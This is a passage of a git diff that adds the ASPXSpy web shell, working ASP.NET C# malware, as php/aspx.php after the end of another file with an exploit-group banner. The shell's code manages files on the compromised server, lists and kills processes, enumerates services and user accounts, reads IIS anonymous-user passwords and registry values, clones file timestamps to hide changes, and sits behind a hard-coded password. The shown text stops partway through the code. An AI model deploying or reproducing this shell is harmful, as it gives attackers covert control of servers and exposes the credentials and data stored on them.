cellspacing='0' cellpadding='0' border='0' width='100%'> +<tr> +<td valign=top> +<center><b><font size='1' face='Verdana'> +CW Exploiter TIM // Cyber Security +</center></font></td></tr> +</body> +</html>"; + + +?> diff --git a/php/aspx.php b/php/aspx.php new file mode 100644 index 0000000..c108f24 --- /dev/null +++ b/php/aspx.php @@ -0,0 +1,2590 @@ +<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> +<%@ import Namespace="System.IO"%> +<%@ import Namespace="System.Diagnostics"%> +<%@ import Namespace="System.Data"%> +<%@ import Namespace="System.Management"%> +<%@ import Namespace="System.Data.OleDb"%> +<%@ import Namespace="Microsoft.Win32"%> +<%@ import Namespace="System.Net.Sockets" %> +<%@ import Namespace="System.Net" %> +<%@ import Namespace="System.Runtime.InteropServices"%> +<%@ import Namespace="System.DirectoryServices"%> +<%@ import Namespace="System.ServiceProcess"%> +<%@ import Namespace="System.Text.RegularExpressions"%> +<%@ Import Namespace="System.Threading"%> +<%@ Import Namespace="System.Data.SqlClient"%> +<%@ import Namespace="Microsoft.VisualBasic"%> +<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<script runat="server"> +/* +Thanks Snailsor,FuYu,BloodSword,Cnqing, +Code by Bin +Make in China +Blog: http://alikaptanoglu.blogspot.com +E-mail : ali_kaptanoglu@hotmail.com +*/ +public string Password="21232f297a57a5a743894a0e4a801fc3";//admin +public string vbhLn="ASPXSpy"; +public int TdgGU=1; +protected OleDbConnection Dtdr=new OleDbConnection(); +protected OleDbCommand Kkvb=new OleDbCommand(); +public NetworkStream NS=null; +public NetworkStream NS1=null; +TcpClient tcp=new TcpClient(); +TcpClient zvxm=new TcpClient(); +ArrayList IVc=new ArrayList(); +protected void Page_load(object sender,EventArgs e) +{ +YFcNP(this); +fhAEn(); +if (!pdo()) +{ +return; +} +if(IsPostBack) +{ +string tkI=Request["__EVENTTARGET"]; +string VqV=Request["__File"]; +if(tkI!="") +{ +switch(tkI) +{ +case "Bin_Parent": +krIR(Ebgw(VqV)); +break; +case "Bin_Listdir": +krIR(Ebgw(VqV)); +break; +case "kRXgt": +kRXgt(Ebgw(VqV)); +break; +case "Bin_Createfile": +gLKc(VqV); +break; +case "Bin_Editfile": +gLKc(VqV); +break; +case "Bin_Createdir": +stNPw(VqV); +break; +case "cYAl": +cYAl(VqV); +break; +case "ksGR": +ksGR(Ebgw(VqV)); +break; +case "SJv": +SJv(VqV); +break; +case "Bin_Regread": +tpRQ(Ebgw(VqV)); +break; +case "hae": +hae(); +break; +case "urJG": +urJG(VqV); +break; +} +if(tkI.StartsWith("dAJTD")) +{ +dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV); +} +else if(tkI.StartsWith("Tlvz")) +{ +Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV); +} +else if(tkI.StartsWith("Bin_CFile")) +{ +YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV); +} +} +} +else +{ +PBZw(); +} +} +public bool pdo() +{ +if(Request.Cookies[vbhLn]==null) +{ +tZSx(); +return false; +} +else +{ +if (Request.Cookies[vbhLn].Value != Password) +{ +tZSx(); +return false; +} +else +{ +return true; +} +} +} +public void tZSx() +{ +ljtzC.Visible=true; +ZVS.Visible=false; +} +protected void YKpI(object sender,EventArgs e) +{ +Session.Abandon(); +Response.Cookies.Add(new HttpCookie(vbhLn,null)); +tZSx(); +} +public void PBZw() +{ +ZVS.Visible=true; +ljtzC.Visible=false; +Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}"; +Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}"; +Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};"; +Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")"; +Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString(); +if (AXSbb.Value==string.Empty) +{ +AXSbb.Value=OElM(Server.MapPath(".")); +} +Bin_H2_Title.InnerText="File Manager >>"; +krIR(AXSbb.Value); +} +public void fhAEn() +{ +try +{ +string[] YRgt=Directory.GetLogicalDrives(); +for(int i=0;i<YRgt.Length;i++) +{ +Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | "); +Bin_Span_Drv.Controls.Add(c); +LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i); +nxeDR.Command+=new CommandEventHandler(this.iVk); +} +}catch(Exception ex){} +} +public string OElM(string path) +{ +if(path.Substring(path.Length-1,1)!=@"\") +{ +path=path+@"\"; +} +return path; +} +public string nrrx(string path) +{ +char[] trim={'\\'}; +if(path.Substring(path.Length-1,1)==@"\") +{ +path=path.TrimEnd(trim); +} +return path; +} +[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")] +public static extern int OMZP(string nDrive); +public string mFvj(string instr) +{ +string EuXD=string.Empty; +int num=OMZP(instr); +switch(num) +{ +case 1: +EuXD="Unknow("+instr+")"; +break; +case 2: +EuXD="Removable("+instr+")"; +break; +case 3: +EuXD="Fixed("+instr+")"; +break; +case 4: +EuXD="Network("+instr+")"; +break; +case 5: +EuXD="CDRom("+instr+")"; +break; +case 6: +EuXD="RAM Disk("+instr+")"; +break; +} +return EuXD.Replace(@"\",""); +} +public string MVVJ(string instr) +{ +byte[] tmp=Encoding.Default.GetBytes(instr); +return Convert.ToBase64String(tmp); +} +public string Ebgw(string instr) +{ +byte[] tmp=Convert.FromBase64String(instr); +return Encoding.Default.GetString(tmp); +} +public void krIR(string path) +{ +WICxe(); +CzfO.Visible=true; +Bin_H2_Title.InnerText="File Manager >>"; +AXSbb.Value=OElM(path); +DirectoryInfo GQMM=new DirectoryInfo(path); +if(Directory.GetParent(nrrx(path))!=null) +{ +string bg=OKM(); +TableRow p=new TableRow(); +for(int i=1;i<6;i++) +{ +TableCell pc=new TableCell(); +if(i==1) +{ +pc.Width=Unit.Parse("2%"); +pc.Text="0"; +p.CssClass=bg; +} +if(i==2) +{ +pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>"; +} +p.Cells.Add(pc); +UGzP.Rows.Add(p); +} +} +try +{ +int vLlH=0; +foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories()) +{ +string bg=OKM(); +vLlH++; +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +tc.Width=Unit.Parse("2%"); +tc.Text="0"; +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tr.Cells.Add(tc); +TableCell HczyN=new TableCell(); +HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>"; +tr.Cells.Add(HczyN); +TableCell LYZK=new TableCell(); +LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss"); +tr.Cells.Add(LYZK); +UGzP.Rows.Add(tr); +TableCell ERUL=new TableCell(); +ERUL.Text="--"; +tr.Cells.Add(ERUL); +UGzP.Rows.Add(tr); +TableCell ZGKh=new TableCell(); +ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>"; +tr.Cells.Add(ZGKh); +UGzP.Rows.Add(tr); +} +TableRow cKVA=new TableRow(); +cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;"; +cKVA.Attributes["bgcolor"]="#dddddd"; +TableCell JlmW=new TableCell(); +JlmW.Attributes["colspan"]="6" ; +JlmW.Attributes["height"]="5"; +cKVA.Cells.Add(JlmW); +UGzP.Rows.Add(cKVA); +int aYRwo=0; +foreach(FileInfo Bin_Files in GQMM.GetFiles()) +{ +aYRwo++; +string gb=OKM(); +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +tc.Width=Unit.Parse("2%"); +tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">"; +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=gb; +tr.Attributes["onmouseout"]="this.className='"+gb+"';"; +tr.Cells.Add(tc); +TableCell filename=new TableCell(); +if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath)) +{ +string url=Request.Url.ToString(); +filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>"; +} +else +{ +filename.Text=Bin_Files.Name; +} +TableCell albt=new TableCell(); +albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss"); +TableCell YzK=new TableCell(); +YzK.Text=mTG(Bin_Files.Length); +TableCell GLpi=new TableCell(); +GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> "; +tr.Cells.Add(filename); +tr.Cells.Add(albt); +tr.Cells.Add(YzK); +tr.Cells.Add(GLpi); +UGzP.Rows.Add(tr); +} +string lgb=OKM(); +TableRow oWam=new TableRow(); +oWam.CssClass=lgb; +for(int i=1;i<4;i++) +{ +TableCell lGV=new TableCell(); +if(i==1) +{ +lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>"; +} +if(i==2) +{ +lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>"; +} +if(i==3) +{ +lGV.ColumnSpan=4; +lGV.Style.Add("text-align","right"); +lGV.Text=vLlH+" directories/ "+aYRwo+" files"; +} +oWam.Cells.Add(lGV); +} +UGzP.Rows.Add(oWam); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public string OKM() +{ +TdgGU++; +if(TdgGU % 2==0) +{ +return "alt1"; +} +else +{ +return "alt2"; +} +} +public void kRXgt(string qcKu) +{ +try +{ +Directory.Delete(qcKu,true); +xseuB("Directory delete new success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(Directory.GetParent(qcKu).ToString()); +} +public void dAJTD(string sdir,string ddir) +{ +try +{ +Directory.Move(sdir,ddir); +xseuB("Directory Renamed Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void Tlvz(string sfile,string dfile) +{ +try +{ +File.Move(sfile,dfile); +xseuB("File Renamed Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void YByN(string spath,string dpath) +{ +try +{ +File.Copy(spath,dpath); +xseuB("File Copy Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void stNPw(string path) +{ +try +{ +Directory.CreateDirectory(AXSbb.Value+path); +xseuB("Directory created success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void gLKc(string path) +{ +if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile") +{ +foreach(ListItem item in NdCX.Items) +{ +if(item.Selected=true) +{ +item.Selected=false; +} +} +} +Bin_H2_Title.InnerHtml="Create/ Edit File >>"; +WICxe(); +vrFA.Visible=true; +if(path.IndexOf(":")< 0) +{ +Sqon.Value=AXSbb.Value+path; +} +else +{ +Sqon.Value=path; +} +if(File.Exists(Sqon.Value)) +{ +StreamReader sr; +if(NdCX.SelectedItem.Text=="UTF-8") +{ +sr=new StreamReader(Sqon.Value,Encoding.UTF8); +} +else +{ +sr=new StreamReader(Sqon.Value,Encoding.Default); +} +Xgvv.InnerText=sr.ReadToEnd(); +sr.Close(); +} +else +{ +Xgvv.InnerText=string.Empty; +} +} +public void ksGR(string path) +{ +FileInfo fs=new FileInfo(path); +Response.Clear(); +Page.Response.ClearHeaders(); +Page.Response.Buffer=false; +this.EnableViewState=false; +Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8)); +Response.AddHeader("Content-Length",fs.Length.ToString()); +Page.Response.ContentType="application/unknown"; +Response.WriteFile(fs.FullName); +Page.Response.Flush(); +Page.Response.Close(); +Response.End(); +Page.Response.Clear(); +} +public void SJv(string path) +{ +try +{ +string[] spdT=path.Split(','); +for(int i=0;i<spdT.Length-1;i++) +{ +File.Delete(AXSbb.Value+Ebgw(spdT[i])); +} +xseuB("File Delete Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +public void hae() +{ +try +{ +File.Delete(Request.PhysicalPath); +Response.Redirect("http://www.rootkit.net.cn"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void cYAl(string path) +{ +Bin_H2_Title.InnerHtml="Clone file was last modified time >>"; +WICxe(); +zRyG.Visible=true; +QiFB.Value=AXSbb.Value+path; +lICp.Value=AXSbb.Value; +pWVL.Value=AXSbb.Value+path; +string Att=File.GetAttributes(QiFB.Value).ToString(); +if(Att.LastIndexOf("ReadOnly")!=-1) +{ +ZhWSK.Checked=true; +} +if(Att.LastIndexOf("System")!=-1) +{ +SsR.Checked=true; +} +if(Att.LastIndexOf("Hidden")!=-1) +{ +ccB.Checked=true; +} +if(Att.LastIndexOf("Archive")!=-1) +{ +fbyZ.Checked=true; +} +yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString(); +uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString(); +aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString(); +} +public static String mTG(Int64 fileSize) +{ +if(fileSize<0) +{ +throw new ArgumentOutOfRangeException("fileSize"); +} +else if(fileSize >= 1024 * 1024 * 1024) +{ +return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024)); +} +else if(fileSize >= 1024 * 1024) +{ +return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024)); +} +else if(fileSize >= 1024) +{ +return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024); +} +else +{ +return string.Format("{0} B",fileSize); +} +} +private bool SGde(string sSrc) +{ +Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$"); +if(reg.IsMatch(sSrc)) +{ +return true; +} +else +{ +return false; +} +} +public void AdCx() +{ +string qcKu=string.Empty; +string mWGEm="IIS://localhost/W3SVC"; +GlI.Style.Add("word-break","break-all"); +try +{ +DirectoryEntry HHzcY=new DirectoryEntry(mWGEm); +int fmW=0; +foreach(DirectoryEntry child in HHzcY.Children) +{ +if(SGde(child.Name.ToString())) +{ +fmW++; +DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString()); +DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir"); +string bg=OKM(); +TableRow TR=new TableRow(); +TR.Attributes["onmouseover"]="this.className='focus';"; +TR.CssClass=bg; +TR.Attributes["onmouseout"]="this.className='"+bg+"';"; +TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString(); +for(int i=1;i<6;i++) +{ +try +{ +TableCell tfit=new TableCell(); +switch(i) +{case 1: +tfit.Text=fmW.ToString(); +break; +case 2: +tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString(); +break; +case 3: +tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString(); +break; +case 4: +StringBuilder sb=new StringBuilder(); +PropertyValueCollection pc=child.Properties["ServerBindings"]; +for (int j=0; j < pc.Count; j++) +{ +sb.Append(pc[j].ToString()+"<br>"); +} +tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4); +break; +case 5: +tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>"; +break; +} +TR.Cells.Add(tfit); +} +catch (Exception ex) +{ +xseuB(ex.Message); +continue; +} +} +GlI.Controls.Add(TR); +} +} +} +catch(Exception ex) +{ +xseuB(ex.Message); +} +} +public ManagementObjectCollection PhQTd(string query) +{ +ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query)); +return QS.Get(); +} +public DataTable cCf(string query) +{ +DataTable dt=new DataTable(); +int i=0; +ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query)); +try +{ +foreach(ManagementObject m in QS.Get()) +{ +DataRow dr=dt.NewRow(); +PropertyDataCollection.PropertyDataEnumerator oEnum; +oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator); +while(oEnum.MoveNext()) +{ +PropertyData DRU=(PropertyData)oEnum.Current; +if(dt.Columns.IndexOf(DRU.Name)==-1) +{ +dt.Columns.Add(DRU.Name); +dt.Columns[dt.Columns.Count-1].DefaultValue=""; +} +if(m[DRU.Name]!=null) +{ +dr[DRU.Name]=m[DRU.Name].ToString(); +} +else +{ +dr[DRU.Name]=string.Empty; +} +} +dt.Rows.Add(dr); +} +} +catch(Exception error) +{ +} +return dt; +} +public void YUw() +{ +try +{ +Bin_H2_Title.InnerText="Process >>"; +WICxe(); +DCbS.Visible=true; +int UEbTI=0; +Process[] p=Process.GetProcesses(); +foreach(Process sp in p) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +for(int i=1;i<7;i++) +{ +TableCell td=new TableCell(); +if(i==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(i==2) +{ +td.Text=sp.Id.ToString(); +tr.Controls.Add(td); +} +if(i==3) +{ +td.Text=sp.ProcessName.ToString(); +tr.Controls.Add(td); +} +if(i==4) +{ +td.Text=sp.Threads.Count.ToString(); +tr.Controls.Add(td); +} +if(i==5) +{ +td.Text=sp.BasePriority.ToString(); +tr.Controls.Add(td); +} +if(i==6) +{ +td.Text="--"; +tr.Controls.Add(td); +} +} +IjsL.Controls.Add(tr); +} +} +catch(Exception error) +{ +AIz(); +} +AIz(); +} +public void AIz() +{ +try +{ +Bin_H2_Title.InnerText="Process >>"; +WICxe(); +DCbS.Visible=true; +int UEbTI=0; +DataTable dt=cCf("Win32_Process"); +for(int j=0;j<dt.Rows.Count;j++) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +for(int i=1;i<7;i++) +{ +TableCell td=new TableCell(); +if(i==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(i==2) +{ +td.Text=dt.Rows[j]["ProcessID"].ToString(); +tr.Controls.Add(td); +} +if(i==3) +{ +td.Text=dt.Rows[j]["Name"].ToString(); +tr.Controls.Add(td); +} +if(i==4) +{ +td.Text=dt.Rows[j]["ThreadCount"].ToString(); +tr.Controls.Add(td); +} +if(i==5) +{ +td.Text=dt.Rows[j]["Priority"].ToString(); +tr.Controls.Add(td); +} +if(i==6) +{ +if( dt.Rows[j]["CommandLine"]!=string.Empty) +{ +td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>"; +} +else +{ +td.Text="--"; +} +tr.Controls.Add(td); +} +} +IjsL.Controls.Add(tr); +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void urJG(string pid) +{ +try +{ +foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'")) +{ +p.InvokeMethod("Terminate",null); +p.Dispose(); +} +xseuB("Process Kill Success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +AIz(); +} +public void oHpF() +{ +try +{ +Bin_H2_Title.InnerText="Services >>"; +WICxe(); +iQxm.Visible=true; +int UEbTI=0; +ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices(); +for(int i=0;i<kQmRu.Length;i++) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +for(int b=1;b<7;b++) +{ +TableCell td=new TableCell(); +if(b==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(b==2) +{ +td.Text="null"; +tr.Controls.Add(td); +} +if(b==3) +{ +td.Text=kQmRu[i].ServiceName.ToString(); +tr.Controls.Add(td); +} +if(b==4) +{ +td.Text=""; +tr.Controls.Add(td); +} +if(b==5) +{ +string kOIo=kQmRu[i].Status.ToString(); +if(kOIo=="Running") +{ +td.Text="<font color=green>"+kOIo+"</font>"; +} +else +{ +td.Text="<font color=red>"+kOIo+"</font>"; +} +tr.Controls.Add(td); +} +if(b==6) +{ +td.Text=""; +tr.Controls.Add(td); +} +} +vHCs.Controls.Add(tr); +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void tZRH() +{ +try +{ +Bin_H2_Title.InnerText="Services >>"; +WICxe(); +iQxm.Visible=true; +int UEbTI=0; +DataTable dt=cCf("Win32_Service"); +for(int j=0;j<dt.Rows.Count;j++) +{ +UEbTI++; +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tr.Attributes["title"]=dt.Rows[j]["Description"].ToString(); +for(int i=1;i<7;i++) +{ +TableCell td=new TableCell(); +if(i==1) +{ +td.Width=Unit.Parse("2%"); +td.Text=UEbTI.ToString(); +tr.Controls.Add(td); +} +if(i==2) +{ +td.Text=dt.Rows[j]["ProcessID"].ToString(); +tr.Controls.Add(td); +} +if(i==3) +{ +td.Text=dt.Rows[j]["Name"].ToString(); +tr.Controls.Add(td); +} +if(i==4) +{ +td.Text=dt.Rows[j]["PathName"].ToString(); +tr.Controls.Add(td); +} +if(i==5) +{ +string kOIo=dt.Rows[j]["State"].ToString(); +if(kOIo=="Running") +{ +td.Text="<font color=green>"+kOIo+"</font>"; +} +else +{ +td.Text="<font color=red>"+kOIo+"</font>"; +} +tr.Controls.Add(td); +} +if(i==6) +{ +td.Text=dt.Rows[j]["StartMode"].ToString(); +tr.Controls.Add(td); +} +} +vHCs.Controls.Add(tr); +} +} +catch(Exception error) +{ +oHpF(); +} +} +public void PLd() +{ +try +{ +WICxe(); +xWVQ.Visible=true; +Bin_H2_Title.InnerText="User Information >>"; +DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString()); +foreach(DirectoryEntry child in TWQ.Children) +{ +foreach(string name in child.Properties.PropertyNames) +{ +PropertyValueCollection pvc=child.Properties[name]; +int c=pvc.Count; +for(int i=0;i<c;i++) +{ +if(name!="objectSid" && name!="Parameters" && name!="LoginHours") +{ +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +TableCell td=new TableCell(); +td.Text=name; +tr.Controls.Add(td); +TableCell td1=new TableCell(); +td1.Text=pvc[i].ToString(); +tr.Controls.Add(td1); +VPa.Controls.Add(tr); +} +} +} +TableRow trn=new TableRow(); +for(int x=1;x<3;x++) +{ +TableCell tdn=new TableCell(); +tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;"; +trn.Controls.Add(tdn); +VPa.Controls.Add(trn); +} +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void iLVUT() +{ +try +{ +WICxe(); +xWVQ.Visible=true; +Bin_H2_Title.InnerText="User Information >>"; +DataTable user=cCf("Win32_UserAccount"); +for(int i=0;i<user.Rows.Count;i++) +{ +for(int j=0;j<user.Columns.Count;j++) +{ +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +TableCell td=new TableCell(); +td.Text=user.Columns[j].ToString(); +tr.Controls.Add(td); +TableCell td1=new TableCell(); +td1.Text=user.Rows[i][j].ToString(); +tr.Controls.Add(td1); +VPa.Controls.Add(tr); +} +TableRow trn=new TableRow(); +for(int x=1;x<3;x++) +{ +TableCell tdn=new TableCell(); +tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;"; +trn.Controls.Add(tdn); +VPa.Controls.Add(trn); +} +} +} +catch(Exception error) +{ +PLd(); +} +} +public void pDVM() +{ +try +{ +RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"); +string IKjwH=DdmPl(EeZ,"PortNumber"); +RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor"); +int cpu=izN.SubKeyCount; +RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\"); +string NPPZ=DdmPl(mQII,"ProcessorNameString"); +WICxe(); +ghaB.Visible=true; +Bin_H2_Title.InnerText="System Information >>"; +Bin_H2_Mac.InnerText="MAC Information >>"; +Bin_H2_Driver.InnerText="Driver Information >>"; +StringBuilder yEwc=new StringBuilder(); +StringBuilder hwJeS=new StringBuilder(); +StringBuilder jXkaE=new StringBuilder(); +yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>"); +yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>"); +yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>"); +yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>"); +yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>"); +yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>"); +yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>"); +yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>"); +DataTable BIOS=cCf("Win32_BIOS"); +yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>"); +yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>"); +yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>"); +DataTable upM=cCf("Win32_PhysicalMemory"); +Int64 oZnZV=0; +for(int i=0;i<upM.Rows.Count;i++) +{ +oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString()); +} +yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>"); +DataTable dOza=cCf("Win32_NetworkAdapterConfiguration"); +for(int i=0;i<dOza.Rows.Count;i++) +{ 